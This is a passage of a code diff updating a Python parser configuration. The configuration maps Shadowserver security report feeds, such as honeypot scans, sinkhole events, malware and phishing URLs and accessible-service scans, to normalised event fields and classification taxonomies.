+        ('user_agent', 'http_agent', validate_to_none),
+        ('extra.method', 'http_request_method', validate_to_none),
+        ('extra.', 'tag', validate_to_none),
+        ('protocol.transport', 'protocol'),
+        ('source.asn', 'src_asn', invalidate_zero),
+        ('source.geolocation.cc', 'src_geo'),
+        ('source.geolocation.region', 'src_region'),
+        ('source.geolocation.city', 'src_city'),
+        ('source.reverse_dns', 'src_hostname'),
+        ('extra.source.naics', 'src_naics', invalidate_zero),
+        ('extra.source.sector', 'src_sector', validate_to_none),
+        ('extra.', 'device_vendor', validate_to_none),
+        ('extra.', 'device_type', validate_to_none),
+        ('extra.', 'device_model', validate_to_none),
+        ('destination.ip', 'dst_ip', validate_ip),
+        ('destination.port', 'dst_port', convert_int),
+        ('destination.asn', 'dst_asn', invalidate_zero),
+        ('destination.geolocation.cc', 'dst_geo'),
+        ('destination.geolocation.region', 'dst_region'),
+        ('destination.geolocation.city', 'dst_city'),
+        ('destination.reverse_dns', 'dst_hostname', validate_to_none),
+        ('extra.destination.naics', 'dst_naics', invalidate_zero),
+        ('extra.destination.sector', 'dst_sector', validate_to_none),
+        ('extra.', 'public_source', validate_to_none),
+        ('malware.name', 'infection'),
+        ('extra.', 'family', validate_to_none),
+        ('extra.', 'application', validate_to_none),
         ('extra.', 'version', validate_to_none),
-        ('extra.', 'manufacturerid', validate_to_none),
-        ('extra.', 'manufacturername', validate_to_none),
-        ('extra.', 'productid', validate_to_none),
-        ('extra.', 'productname', validate_to_none),
+        ('extra.', 'event_id', validate_to_none),
+        ('extra.', 'pattern', validate_to_none),
+        ('destination.url', 'http_url', convert_http_host_and_url, True),
+        ('extra.', 'url_scheme', validate_to_none),
+        ('extra.', 'session_tags', validate_to_none),
+        ('extra.', 'vulnerability_enum', validate_to_none),
+        ('extra.', 'vulnerability_id', validate_to_none),
+        ('extra.', 'vulnerability_class', validate_to_none),
+        ('extra.', 'vulnerability_score', validate_to_none),
+        ('extra.', 'vulnerability_severity', validate_to_none),
+        ('extra.', 'vulnerability_version', validate_to_none),
+        ('extra.', 'threat_framework', validate_to_none),
+        ('extra.', 'threat_tactic_id', validate_to_none),
+        ('extra.', 'threat_technique_id', validate_to_none),
+        ('extra.', 'target_vendor', validate_to_none),
+        ('extra.', 'target_product', validate_to_none),
+        ('extra.', 'target_class', validate_to_none),
+        ('extra.', 'file_md5', validate_to_none),
+        ('extra.', 'file_sha256', validate_to_none),
+        ('extra.', 'request_raw', force_base64),
+        ('extra.', 'body_raw', force_base64),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'vulnerable',
-        'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-ipmi',
-        'protocol.application': 'ipmi',
-        'protocol.transport': 'udp',
+        'classification.taxonomy': 'information-gathering',
+        'classification.type': 'scanner',
+        'protocol.application': 'http',
+        'classification.identifier': 'honeypot-http-scan',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-QOTD
-open_qotd = {
+# https://www.shadowserver.org/what-we-do/network-reporting/honeypot-ics-scanner-events-report/
+event_honeypot_ics_scan = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'src_ip', validate_ip),
+        ('source.port', 'src_port', convert_int),
     ],
     'optional_fields': [
+        ('extra.', 'tag', validate_to_none),
         ('protocol.transport', 'protocol'),
-        ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-qotd' in constant_fields
-        ('extra.', 'quote', validate_to_none),
-        ('source.asn', 'asn', invalidate_zero),
-        ('source.geolocation.cc', 'geo'),
-        ('source.geolocation.region', 'region'),
-        ('source.geolocation.city', 'city'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'sector', validate_to_none),
+        ('source.asn', 'src_asn', invalidate_zero),
+        ('source.geolocation.cc', 'src_geo'),
+        ('source.geolocation.region', 'src_region'),
+        ('source.geolocation.city', 'src_city'),
+        ('source.reverse_dns', 'src_hostname'),
+        ('extra.source.naics', 'src_naics', invalidate_zero),
+        ('extra.source.sector', 'src_sector', validate_to_none),
+        ('extra.', 'device_vendor', validate_to_none),
+        ('extra.', 'device_type', validate_to_none),
+        ('extra.', 'device_model', validate_to_none),
+        ('destination.ip', 'dst_ip', validate_ip),
+        ('destination.port', 'dst_port', convert_int),
+        ('destination.asn', 'dst_asn', invalidate_zero),
+        ('destination.geolocation.cc', 'dst_geo'),
+        ('destination.geolocation.region', 'dst_region'),
+        ('destination.geolocation.city', 'dst_city'),
+        ('destination.reverse_dns', 'dst_hostname', validate_to_none),
+        ('extra.destination.naics', 'dst_naics', invalidate_zero),
+        ('extra.destination.sector', 'dst_sector', validate_to_none),
+        ('extra.', 'public_source', validate_to_none),
+        ('malware.name', 'infection'),
+        ('extra.', 'family', validate_to_none),
+        ('extra.', 'application', validate_to_none),
+        ('extra.', 'version', validate_to_none),
+        ('extra.', 'event_id', validate_to_none),
+        ('extra.', 'state', validate_to_none),
+        ('extra.', 'sensor_id', validate_to_none),
+        ('extra.', 'slave_id', validate_to_none),
+        ('extra.', 'function_code', validate_to_none),
+        ('extra.', 'request', validate_to_none),
+        ('extra.', 'response', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'vulnerable',
-        'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-qotd',
-        'protocol.application': 'qotd',
+        'classification.identifier': 'ics',
+        'classification.taxonomy': 'information-gathering',
+        'classification.type': 'scanner',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-SSDP
-open_ssdp = {
+# https://www.shadowserver.org/what-we-do/network-reporting/ip-spoofer-events-report/
+event_ip_spoofer = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'src_ip', validate_ip),
+        ('source.port', 'src_port', convert_int),
     ],
     'optional_fields': [
+        ('extra.', 'infection', validate_to_none),
+        ('source.network', 'network', validate_to_none),
+        ('extra.', 'tag', validate_to_none),
         ('protocol.transport', 'protocol'),
-        ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-ssdp' in constant_fields
-        ('extra.', 'header', validate_to_none),
-        ('source.asn', 'asn', invalidate_zero),
-        ('source.geolocation.cc', 'geo'),
-        ('source.geolocation.region', 'region'),
-        ('source.geolocation.city', 'city'),
-        ('extra.', 'systime', validate_to_none),
-        ('extra.', 'cache_control', validate_to_none),
-        ('extra.', 'location', validate_to_none),
-        ('extra.', 'server', validate_to_none),
-        ('extra.', 'search_target', validate_to_none),
-        ('extra.', 'unique_service_name', validate_to_none),
-        ('extra.', 'host', validate_to_none),
-        ('extra.', 'nts', validate_to_none),
-        ('extra.', 'nt', validate_to_none),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'sector', validate_to_none),
+        ('source.asn', 'src_asn', invalidate_zero),
+        ('source.geolocation.cc', 'src_geo'),
+        ('source.geolocation.region', 'src_region'),
+        ('source.geolocation.city', 'src_city'),
+        ('source.reverse_dns', 'src_hostname'),
+        ('extra.source.naics', 'src_naics', invalidate_zero),
+        ('extra.source.sector', 'src_sector', validate_to_none),
+        ('extra.', 'device_vendor', validate_to_none),
+        ('extra.', 'device_type', validate_to_none),
+        ('extra.', 'device_model', validate_to_none),
+        ('destination.ip', 'dst_ip', validate_ip),
+        ('destination.port', 'dst_port', convert_int),
+        ('destination.asn', 'dst_asn', invalidate_zero),
+        ('destination.geolocation.cc', 'dst_geo'),
+        ('destination.geolocation.region', 'dst_region'),
+        ('destination.geolocation.city', 'dst_city'),
+        ('destination.reverse_dns', 'dst_hostname', validate_to_none),
+        ('extra.destination.naics', 'dst_naics', invalidate_zero),
+        ('extra.destination.sector', 'dst_sector', validate_to_none),
+        ('extra.', 'public_source', validate_to_none),
+        ('extra.', 'family', validate_to_none),
+        ('extra.', 'application', validate_to_none),
+        ('extra.', 'version', validate_to_none),
+        ('extra.', 'event_id', validate_to_none),
+        ('extra.', 'routedspoof', validate_to_none),
+        ('extra.', 'session', validate_to_none),
+        ('extra.', 'nat', convert_bool),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'vulnerable',
-        'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-ssdp',
-        'protocol.application': 'ssdp',
+        'classification.taxonomy': 'fraud',
+        'classification.type': 'masquerade',
+        'classification.identifier': 'ip-spoofer',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-SNMP
-open_snmp = {
+# https://www.shadowserver.org/what-we-do/network-reporting/sinkhole-events-report/
+event_sinkhole = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'src_ip', validate_ip),
+        ('source.port', 'src_port', convert_int),
     ],
     'optional_fields': [
+        ('classification.identifier', 'infection', validate_to_none),
+        ('malware.name', 'family', validate_to_none),
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'infection', validate_to_none),
         ('protocol.transport', 'protocol'),
-        ('source.reverse_dns', 'hostname'),
-        ('extra.', 'sysdesc', validate_to_none),
-        ('extra.', 'sysname', validate_to_none),
-        ('source.asn', 'asn', invalidate_zero),
-        ('source.geolocation.cc', 'geo'),
-        ('source.geolocation.region', 'region'),
-        ('source.geolocation.city', 'city'),
-        ('extra.', 'version', convert_int),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'sector', validate_to_none),
+        ('source.asn', 'src_asn', invalidate_zero),
+        ('source.geolocation.cc', 'src_geo'),
+        ('source.geolocation.region', 'src_region'),
+        ('source.geolocation.city', 'src_city'),
+        ('source.reverse_dns', 'src_hostname'),
+        ('extra.source.naics', 'src_naics', invalidate_zero),
+        ('extra.source.sector', 'src_sector', validate_to_none),
+        ('extra.', 'device_vendor', validate_to_none),
+        ('extra.', 'device_type', validate_to_none),
+        ('extra.', 'device_model', validate_to_none),
+        ('destination.ip', 'dst_ip', validate_ip),
+        ('destination.port', 'dst_port', convert_int),
+        ('destination.asn', 'dst_asn', invalidate_zero),
+        ('destination.geolocation.cc', 'dst_geo'),
+        ('destination.geolocation.region', 'dst_region'),
+        ('destination.geolocation.city', 'dst_city'),
+        ('destination.reverse_dns', 'dst_hostname', validate_to_none),
+        ('extra.destination.naics', 'dst_naics', invalidate_zero),
+        ('extra.destination.sector', 'dst_sector', validate_to_none),
+        ('extra.', 'public_source', validate_to_none),
+        ('extra.', 'application', validate_to_none),
+        ('extra.', 'version', validate_to_none),
+        ('extra.', 'event_id', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'vulnerable',
-        'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-snmp',
-        'protocol.application': 'snmp',
+        'classification.taxonomy': 'malicious-code',
+        'classification.type': 'infected-system',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-MSSQL
-open_mssql = {
+# https://www.shadowserver.org/what-we-do/network-reporting/sinkhole-dns-events-report/
+event_sinkhole_dns = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'src_ip', validate_ip),
+        ('source.port', 'src_port', convert_int),
     ],
     'optional_fields': [
+        ('extra.naics', 'src_naics', invalidate_zero),
+        ('extra.sector', 'src_sector', validate_to_none),
+        ('extra.dns_query_type', 'query_type'),
+        ('extra.dns_query', 'query'),
+        ('malware.name', 'family', validate_to_none),
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'infection', validate_to_none),
         ('protocol.transport', 'protocol'),
-        ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-mssql' in constant_fields
-        ('extra.', 'version', validate_to_none),
-        ('source.asn', 'asn', invalidate_zero),
-        ('source.geolocation.cc', 'geo'),
-        ('source.geolocation.region', 'region'),
-        ('source.geolocation.city', 'city'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('source.local_hostname', 'server_name'),
-        ('extra.', 'instance_name', validate_to_none),
-        ('extra.', 'tcp_port', convert_int),
-        ('extra.', 'named_pipe', validate_to_none),
-        ('extra.', 'response_length', convert_int),
-        ('extra.', 'amplification', convert_float),
-        ('extra.', 'sector', validate_to_none),
+        ('source.asn', 'src_asn', invalidate_zero),
+        ('source.geolocation.cc', 'src_geo'),
+        ('source.geolocation.region', 'src_region'),
+        ('source.geolocation.city', 'src_city'),
+        ('source.reverse_dns', 'src_hostname'),
+        ('extra.', 'device_vendor', validate_to_none),
+        ('extra.', 'device_type', validate_to_none),
+        ('extra.', 'device_model', validate_to_none),
+        ('extra.', 'count', convert_int),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'vulnerable',
-        'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-mssql',
-        'protocol.application': 'mssql',
+        'classification.identifier': 'sinkholedns',
+        'classification.taxonomy': 'other',
+        'classification.type': 'other',
+        'protocol.application': 'dns',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-MongoDB
-open_mongodb = {
+# https://www.shadowserver.org/what-we-do/network-reporting/sinkhole-http-events-report/
+event_sinkhole_http = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'src_ip', validate_ip),
+        ('source.port', 'src_port', convert_int),
     ],
     'optional_fields': [
+        ('classification.identifier', 'tag'),
+        ('malware.name', 'family', validate_to_none),
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'infection', validate_to_none),
         ('protocol.transport', 'protocol'),
-        ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-mongodb' in constant_fields
+        ('source.asn', 'src_asn', invalidate_zero),
+        ('source.geolocation.cc', 'src_geo'),
+        ('source.geolocation.region', 'src_region'),
+        ('source.geolocation.city', 'src_city'),
+        ('source.reverse_dns', 'src_hostname'),
+        ('extra.source.naics', 'src_naics', invalidate_zero),
+        ('extra.source.sector', 'src_sector', validate_to_none),
+        ('extra.', 'device_vendor', validate_to_none),
+        ('extra.', 'device_type', validate_to_none),
+        ('extra.', 'device_model', validate_to_none),
+        ('destination.ip', 'dst_ip', validate_ip),
+        ('destination.port', 'dst_port', convert_int),
+        ('destination.asn', 'dst_asn', invalidate_zero),
+        ('destination.geolocation.cc', 'dst_geo'),
+        ('destination.geolocation.region', 'dst_region'),
+        ('destination.geolocation.city', 'dst_city'),
+        ('destination.reverse_dns', 'dst_hostname', validate_to_none),
+        ('extra.destination.naics', 'dst_naics', invalidate_zero),
+        ('extra.destination.sector', 'dst_sector', validate_to_none),
+        ('extra.', 'public_source', validate_to_none),
+        ('extra.', 'application', validate_to_none),
         ('extra.', 'version', validate_to_none),
-        ('source.asn', 'asn', invalidate_zero),
-        ('source.geolocation.cc', 'geo'),
-        ('source.geolocation.region', 'region'),
-        ('source.geolocation.city', 'city'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'gitversion', validate_to_none),
-        ('extra.', 'sysinfo', validate_to_none),
-        ('extra.', 'opensslversion', validate_to_none),
-        ('extra.', 'allocator', validate_to_none),
-        ('extra.', 'javascriptengine', validate_to_none),
-        ('extra.', 'bits', validate_to_none),
-        ('extra.', 'maxbsonobjectsize', validate_to_none),
-        ('extra.', 'ok', validate_to_none),
-        ('extra.', 'visible_databases', validate_to_none),
-        ('extra.', 'sector', validate_to_none),
+        ('extra.', 'event_id', validate_to_none),
+        ('destination.url', 'http_url', convert_http_host_and_url, True),
+        ('destination.fqdn', 'http_host', validate_fqdn),
+        ('extra.', 'http_agent', validate_to_none),
+        ('extra.', 'forwarded_by', validate_to_none),
+        ('extra.', 'ssl_cipher', validate_to_none),
+        ('extra.', 'http_referer', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'vulnerable',
-        'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-mongodb',
-        'protocol.application': 'mongodb',
+        'classification.taxonomy': 'malicious-code',
+        'classification.type': 'infected-system',
+        'protocol.application': 'http',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-NetBIOS
-open_netbios_nameservice = {
+# https://www.shadowserver.org/what-we-do/network-reporting/sinkhole-http-referer-events-report/
+event_sinkhole_http_referer = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
     ],
     'optional_fields': [
+        ('malware.name', 'family', validate_to_none),
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'infection', validate_to_none),
         ('protocol.transport', 'protocol'),
-        ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-netbios-nameservice' in constant_fields
-        ('extra.', 'mac_address', validate_to_none),
+        ('extra.', 'http_referer_ip', validate_ip),
+        ('extra.', 'http_referer_port', convert_int),
+        ('extra.', 'http_referer_asn', invalidate_zero),
+        ('extra.', 'http_referer_geo', validate_to_none),
+        ('extra.', 'http_referer_region', validate_to_none),
+        ('extra.', 'http_referer_city', validate_to_none),
+        ('extra.', 'http_referer_hostname', validate_to_none),
+        ('extra.', 'http_referer_naics', invalidate_zero),
+        ('extra.', 'http_referer_sector', validate_to_none),
+        ('destination.ip', 'dst_ip', validate_ip),
+        ('destination.port', 'dst_port', convert_int),
+        ('destination.asn', 'dst_asn', invalidate_zero),
+        ('destination.geolocation.cc', 'dst_geo'),
+        ('destination.geolocation.region', 'dst_region'),
+        ('destination.geolocation.city', 'dst_city'),
+        ('destination.reverse_dns', 'dst_hostname', validate_to_none),
+        ('extra.destination.naics', 'dst_naics', invalidate_zero),
+        ('extra.destination.sector', 'dst_sector', validate_to_none),
+        ('extra.', 'public_source', validate_to_none),
+        ('extra.', 'application', validate_to_none),
+        ('extra.', 'version', validate_to_none),
+        ('extra.', 'event_id', validate_to_none),
+        ('destination.url', 'http_url', convert_http_host_and_url, True),
+        ('destination.fqdn', 'http_host', validate_fqdn),
+        ('extra.', 'http_referer', validate_to_none),
+    ],
+    'constant_fields': {
+        'classification.taxonomy': 'other',
+        'classification.type': 'other',
+        'classification.identifier': 'sinkhole-http-referer',
+    },
+}
+
+# https://www.shadowserver.org/what-we-do/network-reporting/malware-url-report/
+malware_url = {
+    'required_fields': [
+        ('time.source', 'timestamp', add_UTC_to_timestamp),
+        ('source.ip', 'ip', validate_ip),
+    ],
+    'optional_fields': [
+        ('source.url', 'url', convert_http_host_and_url, True),
+        ('source.fqdn', 'host', validate_fqdn),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'workgroup', validate_to_none),
-        ('extra.', 'machine_name', validate_to_none),
-        ('source.account', 'username'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'sector', validate_to_none),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sector', 'sector', validate_to_none),
+        ('malware.name', 'tag'),
+        ('extra.', 'source', validate_to_none),
+        ('malware.hash.sha256', 'sha256', validate_to_none),
+        ('extra.', 'application', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'vulnerable',
-        'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-netbios-nameservice',
-        'protocol.application': 'netbios-nameservice',
+        'classification.taxonomy': 'malicious-code',
+        'classification.type': 'malware-distribution',
+        'classification.identifier': 'malware-url',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-Elasticsearch
-open_elasticsearch = {
+phish_url = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
     ],
     'optional_fields': [
-        ('protocol.transport', 'protocol'),
-        ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-elasticsearch' in constant_fields
-        ('extra.', 'version', validate_to_none),
+        ('source.url', 'url', convert_http_host_and_url, True),
+        ('source.fqdn', 'host', validate_fqdn),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'ok', convert_bool),
-        ('extra.', 'name', validate_to_none),
-        ('extra.', 'cluster_name', validate_to_none),
-        ('extra.', 'status', convert_int),
-        ('extra.', 'build_hash', validate_to_none),
-        ('extra.', 'build_timestamp', validate_to_none),
-        ('extra.', 'build_snapshot', convert_bool),
-        ('extra.', 'lucene_version', validate_to_none),
-        ('extra.', 'tagline', validate_to_none),
-        ('extra.', 'sector', validate_to_none),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sector', 'sector', validate_to_none),
+        ('extra.', 'source', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'vulnerable',
-        'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-elasticsearch',
-        'protocol.application': 'elasticsearch',
+        'classification.taxonomy': 'fraud',
+        'classification.type': 'phishing',
+        'classification.identifier': 'phish-url',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/DNS-open-resolvers
-dns_open_resolvers = {
+# http://www.shadowserver.org/wiki/pmwiki.php/Services/Sandbox-Connection
+sandbox_conn = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('destination.fqdn', 'host', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
-        ('source.geolocation.region', 'region'),
-        ('source.geolocation.city', 'city'),
+        ('malware.hash.md5', 'md5', validate_to_none),
         ('protocol.transport', 'protocol'),
-        ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'dns-open-resolver' in constant_fields
-        ('extra.', 'min_amplification', convert_float),
-        ('extra.', 'dns_version', validate_to_none),
-        ('os.name', 'p0f_genre'),
-        ('os.version', 'p0f_detail'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'sector', validate_to_none),
+        ('extra.', 'bytes_in', validate_to_none),
+        ('extra.', 'bytes_out', validate_to_none),
     ],
     'constant_fields': {
-        'classification.type': 'vulnerable-system',
-        'classification.taxonomy': 'vulnerable',
-        'classification.identifier': 'dns-open-resolver',
+        'classification.taxonomy': 'malicious-code',
+        'classification.type': 'malware-distribution',
+        'classification.identifier': 'sandbox-conn',
+    },
+}
+
+sandbox_dns = {
+    'required_fields': [
+        ('time.source', 'timestamp', add_UTC_to_timestamp),
+    ],
+    'optional_fields': [
+        ('extra.dns_query_type', 'type', validate_to_none),
+        ('malware.hash.md5', 'md5hash', validate_to_none),
+        ('extra.', 'request', validate_to_none),
+        ('extra.', 'response', validate_to_none),
+        ('extra.', 'family', validate_to_none),
+        ('malware.name', 'tag'),
+        ('extra.', 'source', validate_to_none),
+    ],
+    'constant_fields': {
+        'classification.taxonomy': 'other',
+        'classification.type': 'other',
         'protocol.application': 'dns',
+        'classification.identifier': 'sandbox-dns',
+    },
+}
+
+# https://www.shadowserver.org/what-we-do/network-reporting/sandbox-url-report/
+sandbox_url = {
+    'required_fields': [
+        ('time.source', 'timestamp', add_UTC_to_timestamp),
+        ('source.ip', 'ip', validate_ip),
+    ],
+    'optional_fields': [
+        ('destination.url', 'url', validate_to_none),
+        ('destination.fqdn', 'host', validate_to_none),
+        ('extra.http_request_method', 'method', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('malware.hash.md5', 'md5', validate_to_none),
+        ('user_agent', 'user_agent', validate_to_none),
+    ],
+    'constant_fields': {
+        'classification.taxonomy': 'malicious-code',
+        'classification.type': 'malware-distribution',
+        'classification.identifier': 'sandbox-url',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/NTP-Monitor
-ntp_monitor = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-adb-report/
+scan_adb = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        ('extra.', 'packets', convert_int),
-        ('extra.', 'size', convert_int),
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'sector', validate_to_none),
+        ('extra.', 'name', validate_to_none),
+        ('extra.', 'model', validate_to_none),
+        ('extra.', 'device', validate_to_none),
+        ('extra.', 'features', validate_to_none),
+        ('extra.', 'device_vendor', validate_to_none),
+        ('extra.', 'device_type', validate_to_none),
+        ('extra.', 'device_model', validate_to_none),
+        ('extra.', 'device_version', validate_to_none),
+        ('extra.', 'device_sector', validate_to_none),
     ],
     'constant_fields': {
+        'classification.identifier': 'accessible-adb',
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-        'classification.identifier': 'ntp-monitor',
-        'protocol.application': 'ntp',
+        'protocol.application': 'adb',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Ssl-Freak-Scan
-ssl_freak_vulnerable_servers = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-afp-report/
+scan_afp = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'ssl-freak' in constant_fields
-        ('extra.', 'handshake', validate_to_none),
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'cipher_suite', validate_to_none),
-        ('extra.', 'cert_length', validate_to_none),
-        ('extra.', 'subject_common_name', validate_to_none),
-        ('extra.', 'issuer_common_name', validate_to_none),
-        ('extra.', 'cert_issue_date', validate_to_none),
-        ('extra.', 'cert_expiration_date', validate_to_none),
-        ('extra.', 'sha1_fingerprint', validate_to_none),
-        ('extra.', 'cert_serial_number', validate_to_none),
-        ('extra.', 'signature_algorithm', validate_to_none),
-        ('extra.', 'key_algorithm', validate_to_none),
-        ('extra.', 'subject_organization_name', validate_to_none),
-        ('extra.', 'subject_organization_unit_name', validate_to_none),
-        ('extra.', 'subject_country', validate_to_none),
-        ('extra.', 'subject_state_or_province_name', validate_to_none),
-        ('extra.', 'subject_locality_name', validate_to_none),
-        ('extra.', 'subject_street_address', validate_to_none),
-        ('extra.', 'subject_postal_code', validate_to_none),
-        ('extra.', 'subject_surname', validate_to_none),
-        ('extra.', 'subject_given_name', validate_to_none),
-        ('extra.', 'subject_email_address', validate_to_none),
-        ('extra.', 'subject_business_category', validate_to_none),
-        ('extra.', 'subject_serial_number', validate_to_none),
-        ('extra.', 'issuer_organization_name', validate_to_none),
-        ('extra.', 'issuer_organization_unit_name', validate_to_none),
-        ('extra.', 'issuer_country', validate_to_none),
-        ('extra.', 'issuer_state_or_province_name', validate_to_none),
-        ('extra.', 'issuer_locality_name', validate_to_none),
-        ('extra.', 'issuer_street_address', validate_to_none),
-        ('extra.', 'issuer_postal_code', validate_to_none),
-        ('extra.', 'issuer_surname', validate_to_none),
-        ('extra.', 'issuer_given_name', validate_to_none),
-        ('extra.', 'issuer_email_address', validate_to_none),
-        ('extra.', 'issuer_business_category', validate_to_none),
-        ('extra.', 'issuer_serial_number', validate_to_none),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'freak_vulnerable', convert_bool),
-        ('extra.', 'freak_cipher_suite', validate_to_none),
-        ('extra.', 'sector', validate_to_none),
-        ('extra.', 'sha256_fingerprint', validate_to_none),
-        ('extra.', 'sha512_fingerprint', validate_to_none),
-        ('extra.', 'md5_fingerprint', validate_to_none),
-        ('extra.', 'http_response_type', validate_to_none),
-        ('extra.', 'http_code', convert_int),
-        ('extra.', 'http_reason', validate_to_none),
-        ('extra.', 'content_type', validate_to_none),
-        ('extra.', 'http_connection', validate_to_none),
-        ('extra.', 'www_authenticate', validate_to_none),
-        ('extra.', 'set_cookie', validate_to_none),
-        ('extra.', 'server_type', validate_to_none),
-        ('extra.', 'content_length', validate_to_none),
-        ('extra.', 'transfer_encoding', validate_to_none),
-        ('extra.', 'http_date', convert_date),
-        ('extra.', 'cert_valid', convert_bool),
-        ('extra.', 'self_signed', convert_bool),
-        ('extra.', 'cert_expired', convert_bool),
-        ('extra.', 'browser_trusted', convert_bool),
